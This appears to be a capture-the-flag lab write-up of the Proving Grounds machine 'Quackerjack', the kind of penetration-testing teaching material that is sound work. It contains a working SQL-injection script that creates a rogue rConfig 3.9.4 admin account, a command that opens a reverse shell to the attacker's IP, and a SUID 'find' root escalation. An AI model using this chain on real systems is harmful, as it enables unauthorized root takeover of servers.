Quackerjack - OSPG
Summary Of Result
We gain initial foothold by exploiting the vulnerable version of rConfig - Configuration Management application. We will then escalate our privilege via a misconfigred SUID binary.
Attack Narrative
The general attack is wrapped up into three main phases:
- Enumeration
- Exploitation
- Privilege Escalation
Enumeration
Nmap
We will begin with nmap scan:
# nmap -sV -p- -A -Pn $IP -oA nmap/services
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.2
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
111/tcp rpcbind
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql syn-ack ttl 63 MariaDB (unauthorized)
8081/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
- There are several services running on the system, we specifically target HTTPS on port 8081.
Web Application Port 8081
Navigate to the application, we can directly spot couple of interesting information:
- Running rConfig - Configuration Management.
- Version 3.9.4 → Vulnerable?
After a few researches, we discover that the running rConfig is actually vulnerable to Remote Code Execution.
# searchsploit rConfig 3.9.4
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
rConfig 3.9.4 - 'search.crud.php' Remote Command Injection | php/webapps/48241.py
rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution | php/webapps/48261.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploitation
As stated in official document, the default credentials are admin:admin. However, it might not in this case.
According to the results from the previous searchsploit command, we can potentially execute either script and end up with a reverse shell.
- The second script (
searchField) utilizes SQL Injection to create anadminuser → login asadmin→ abuse theajaxArchiveFiles.phpfile to execute malicious payload. - The first script (
search.crud.php) exploits thesearch.crud.phpfile and thenodeIdparameter to obtain a reverse shell.
Unfortunately, this is not the case because the second script fails to return a revese shell while we need a valid admin credential to successfully execute the first script.
We can try to brute force admin credentials with the username is admin. However, we can also choose to combine two scripts and make our exploit work. As mentioned, the second script will create an admin user by exploiting SQL Injection vulnerability, but the script need to be modified. Otherwise, it won’t work.
The following is the modified script, which can be used to create a valid admin user:
#!/usr/bin/python3
import requests
import sys
import urllib.parse
import string
import random
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from requests.exceptions import Timeout
if len(sys.argv) != 2:
print ("[+] Usage : ./rconfig_exploit.py https://target")
exit()
target = sys.argv[1]
vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
print ("[+] Adding a temporary admin user...")
fake_id = str(random.randint(200,900))
fake_user = "attacker"
fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--"
encoded_request = target+vuln_page+vuln_parameters+addUserPayload
firstrequest = requests.session()
exploit_req = firstrequest.get(encoded_request,verify=False)
request = requests.session()
login_info = {
"user": fake_user,
"pass": "admin",
"sublogin": 1
}
print ("[+] Authenticating as: "+fake_user+":admin ...")
print ("[+] Done.")
After executing the above script, we should be able to login with the credentials: attacker:admin. Now that we have the valid credentials, we can procure a reverse shell using the first script.
# python3 48241.py https://192.168.78.57:8081 attacker admin 192.168.49.78 80
...
Our listener caught the revere shell at port 80 as apache user.
# nc -nlvp 80 2 ⚙
listening on [any] 80 ...
connect to [192.168.49.78] from (UNKNOWN) [192.168.78.57] 56142
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
Privilege Escalation
SUID
Locally enumerate the target reveals us a /usr/bin/find SUID binary.
bash-4.2$ find / -perm -4000 -ls 2>/dev/null
12596477 196 -rwsr-xr-x 1 root root 199304 Oct 30 2018 /usr/bin/find
[...]
SUID Abuse
Leverage the find SUID binary, we can easily acquire root shell.
bash-4.2$ find . -exec /bin/bash -p \;
bash-4.2# whoami
root